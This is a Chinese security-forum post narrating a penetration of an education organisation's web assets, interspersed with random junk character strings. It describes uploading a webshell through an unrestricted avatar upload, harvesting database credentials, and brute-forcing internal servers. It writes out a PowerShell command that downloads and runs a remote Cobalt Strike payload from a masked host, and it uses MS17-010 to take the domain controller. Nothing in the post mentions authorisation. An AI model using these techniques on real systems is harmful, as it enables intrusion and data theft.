找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3544|回复: 0

渗透实战 | 从外网直接打到内网全过程

[复制链接]
发表于 2024-3-1 19:41:32 | 显示全部楼层 |阅读模式

; A1 z T/ m: O/ P* V 这次渗透是一个从01,从外网到拿下域控的实战过程,希望可以给大家一些思路1 F' j* l; |8 h/ h; ~0 g7 y

+ d- i3 P- M/ N9 c% S

$ ~( b5 |+ o4 E9 F1 ]- d   ! f# q4 {( a; F8 b- x

; h' v8 A# q1 j4 Z. V9 E5 i

" b% J8 Q7 F/ n 正文! X3 A0 b' S( \* W2 s9 z8 D

8 u+ P; ]2 g" c' {

2 d- u: ^, D4 ^8 t3 s2 `- P   9 M# F# o, ]7 V

8 Y; T C' r3 d- O7 G9 D

! T( u0 ]5 m& ^$ z6 w+ m1 U2 w 目标:www.xxxx.com(一家教育机构)
( ~: D' i& a$ W2 u' a) S$ z0 a- g& _
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
r+ ]" i: J/ k; z

. j4 {: y, K0 \/ D; |3 c4 ~0 K4 t: }; x

9 t4 {* V" U) J" D; H, \( T" O+ t* e: i vshapes=. W( l$ y( T. K& L

( ?% ^; j* m0 B' F5 J: p

) E0 T' c7 R( N 进行了简单的信息搜集
# a" B+ {5 Y7 s8 x5 [9 n3 L2 m7 {
% h9 M% G1 P; z
+ v' c5 p) S: X" c* B

8 M2 N$ }5 P9 k% |

9 F3 F' `2 d& Q7 F* `5 `* G# v 子域名搜集 $ k( O/ l* G) O4 ^" O6 N/ }% _

$ q8 L- P. a" t7 d+ B' m4 ^1 c

* l* B7 p1 p+ G) Q# B* b& m. S6 m1 w vshapes= ' O( U$ D" g6 H; ^

0 `7 I9 J, T( z2 U

( k3 w. Z" r4 p, r7 s fofa找资产
/ b/ b9 h" C6 {& X- U b S/ R
+ c- K- s% @2 U' S% Q$ `& u
# @6 j! O9 n( w4 u

% C- `( ^1 }$ N0 f) q& \

) r* r! K7 z: p, D1 } vshapes=; [5 a- p l! ^, r5 X- {: d+ ^# X

1 {0 K7 L7 o% h8 V

5 U1 b; Z @8 z* a$ H; Q, w# I0 Y 一共七个资产。去重之后只有两个。
/ Q, m5 T$ ^ r
9 s8 j" Y) n6 l8 b1 s6 T- V
. _: F' W* U ?; M) j! [0 c. {$ A" S

. }2 p6 ]. D/ q' ~% N. Y4 Y

# p/ T5 F$ ^6 ?: b- `8 a+ p 目录探测 & ?- M, S% k0 s4 l* n1 I" E9 q

, E- y" T) z8 D* T& q

! n7 l: }" X S9 f) r* p- s% p5 o vshapes=, M) i' \6 p) c- j; d

# y6 B0 K) D9 e5 a# i' g

: P1 E! z' @& V' ~5 g7 Z 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
9 O# `6 ]6 i. B9 F$ Z/ U+ ?1 j- Z2 [
6 r7 Y1 Z' {+ X% X5 p6 ]3 t. v' O
5 z- [( @/ X2 C) K6 Q& }9 }* {* Y

. ^( m+ `6 l! Q1 [ j1 i" i

8 t- E5 u5 ]- p( a% `% M 我又尝试了通过修改返回包来绕过登录界面! F$ E' U5 T; F4 N2 [7 G) O2 Q

( x! m0 c0 Y' g V

. U+ {( B9 q0 y( } r vshapes= # I3 B6 {" V4 |' c

) |& k6 v( x% Z, @) B

+ ?* Q+ c K4 \ 还是不行,尝试注入无果 $ E* D3 ?4 f r' m* z6 f

& @, i9 y( N0 l2 }$ H; F; F

7 S" G4 a+ z6 p3 z. Y vshapes=9 y- x2 c& S' Y1 Y+ {

* t- p$ w, }6 g

' ~8 f, q1 O1 r 不过我目录探测出了一处Spring信息泄露
& y8 D" F% d3 E" U; }
) e5 p' s; s) J1 V" s6 P
) f {/ o7 t! X) `

1 @* B3 L6 ^5 d0 ^: y

r& Z/ Q4 J# ]: N" j; Y: A- M vshapes=1 M% o6 I9 ?# R2 z# ~8 _9 x

5 s8 n$ _( ^) h W) r# D! o$ B2 I2 z

0 J' K$ A! r1 J# i 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录 * E H+ D" ]! u" K5 ~' B

8 b) `2 q* K+ z

& a9 M" [! x0 ~$ h% j* d, ] vshapes= 2 s2 q4 x. e& d1 z

, |. v- [) J4 b) n6 l2 n; a1 K

$ N: c6 w9 w, l 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。 9 I4 t* m6 B- S7 A) g2 k* _

6 p. e. S$ w$ C7 M. u2 Q

/ s. ^5 S3 n5 l, B vshapes=* H8 g( c% ~2 k6 K$ r, W4 q$ f

5 V0 ]2 B8 e: |) p3 x/ f

; ]1 v- r" b/ H 获取有些师傅到这一步就手机抓包电脑测了。 : N! e3 R- C9 [, q. }; V: j

3 J5 j# ]1 b0 K \

5 N# X% {2 M" | Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。9 E2 C0 Y# {+ h/ B6 F1 u( L

8 t1 R* t7 D9 x5 o; j. S

4 n2 w4 s* r) E 其中在一个公众号发现了小程序,可以进行注册。 3 B e7 F, }8 l1 S: V

% Z. n* w% x; k, S5 ?

8 M- w6 Y7 H, b( j- @7 z 看到了头像上传,尝试上传获取WebShell; w" }; S4 o; \0 B( F

* d0 I9 T. I8 J% |% B/ d, ]

( A) R; p& J( O% Y e1 i vshapes=) L' U3 ?6 C1 V: B, U

7 U5 w0 f0 k' E, `0 g3 G

* ~: `' q0 b5 Q7 \& k' M 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问0 o# j* u. X8 M8 F) M# O

- y1 e0 V0 `2 O6 I; ^

3 ?# B& ]9 o6 I vshapes=/ x% s: V. H C# d. B! t7 d

1 l: [0 F, V3 G5 a+ \" I$ M

) v( E2 l) V) Y/ R( w9 H 然后上了大马 0 a' m; r1 H, P- f0 c. h

3 y6 S6 e2 [2 b+ S

7 q: {5 u4 W/ \! ]: u vshapes= - |, x: Q; m6 _6 S" u! O9 T, U9 c

/ F: k* Z5 z5 `6 J# p% G

, k/ Y) w4 t' @0 R4 l2 C$ s1 V7 W vshapes= x# \8 ~8 Y% _, `; L! A+ e- a [

! n7 k J& k% x9 \

' e; X# z/ t2 E9 A 通过翻找文件发现数据库账号密码3 E5 D6 E5 E+ i4 O

, N5 a+ ?4 h& @; r7 |4 \4 ~3 t

- \& q- g8 E4 m4 u5 [% w( J" n vshapes=, p. R) x) M. N" K+ ~

- i4 x# `/ e! m

2 _+ Z; g2 F* p --内网渗透& c5 L$ {; S# s7 l- S( f& ^( N

# a" v; G' X; E5 d

! c. s! \5 k) Y- Q! v4 g, D( Q7 m3 } 直接通过powershell执行 cs上线 # u7 w" R+ i7 f" p

7 F! L3 s. Q+ ^9 Q. C" _6 j9 e

) T+ v6 R+ ~' A, ?( p y powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))" % E8 d7 M: o6 l4 w

( r' Q9 s# s! P9 l

+ e, ~ m. g7 X3 w vshapes=& ~4 Z. q9 u0 m6 x, J

/ s& j- U. T5 S9 B$ N# f

3 Y) W) T9 N6 K, V 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破 ) g+ |! h, J; ]9 Q* _) d0 p- W

# s7 y2 [8 I: ^; Q

8 l) H. b$ Q8 Z- G% @* Z vshapes=4 J* F! Q* p7 ~/ V0 s6 [/ y Y

- f8 C, u& ^' G! C% `9 x

2 e8 S: ]2 C- A. [ 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
! ^+ m7 a1 S: x* R& T/ o; p% Q$ {
# N( j2 o) P. ^! x. p+ W
0 J7 E4 N8 [1 L5 r
; D: Z2 k1 Q e

, x4 w' K4 j3 k$ m$ d- e, [2 o

6 a1 l8 O7 [3 b9 E) T; ^: | vshapes= ' y9 Y! y, f/ N& ~# s& z% I9 ]5 c9 ~

0 N: J# Q% J* r1 Y; A

. b1 ?; b- T& d! L) Y 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
- j2 B- D+ ~& Z- W- U
# \1 I9 K: k! B
: G' M+ u B# {. K" L

9 N: H. M& G+ @

' `4 E2 _: ~! \5 ?1 T9 b! i( u% E vshapes=7 x/ p" n$ w5 h% l

" {2 |3 O6 z5 A: T# l

( X4 z; z: T: @* Z
, Q- |, I1 T& u8 R
. n6 \. d4 ~' n/ w5 \
7 @' A6 e8 Q8 f# g: g

. p; \9 q/ {7 F3 ?4 ]* L

3 ^) _/ Y' w2 g$ w5 t   . u3 w# J& j$ J: y/ O2 ?/ m u! T

( ]' B& e. I- _; U* a+ \0 e. k' e, r6 U: P

. k* `6 [7 Q$ R 小结* E$ r9 l7 e8 y9 @! g& d# ^

9 c9 }5 e3 ^2 T, W- ?

; s/ j* Z; |! C   3 q6 O* J4 V5 ^; r7 x% Y

+ `& }5 d! w X. x5 h$ g

6 Y. i! O9 g: H* m 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!0 a E6 O4 L2 b! ]' c

% O: A' d: B g

( g; k6 |4 \$ M- O3 |; F, X) V   8 F- E' Y7 ]6 N7 R3 X; H

) `+ m2 O( a9 [, G
    ! G$ w! Q) S# E- e) t9 V
  • * L2 v$ _ N4 s2 U I' z. l   - T3 F5 {5 K1 R" r
  • + U4 x' Q6 L; w* p/ G
  • ) i4 C8 g9 Y t) k# H1 R5 t9 u   ?9 ^+ b b- N2 y' m# N* C: s
  • / W9 Z8 _; X' e+ m$ f8 v
: {1 m( b. T/ F& h

1 D1 I, S( l$ ^2 b- i( a+ o- h/ {' ] 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html/ a1 C+ X* R; t X7 Z: e1 o+ }

- C* F. E2 F( l" S3 Q& r) b

$ S7 W4 b/ _# C" Z# v( L   8 h9 J" p% I3 h. j4 P& _

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表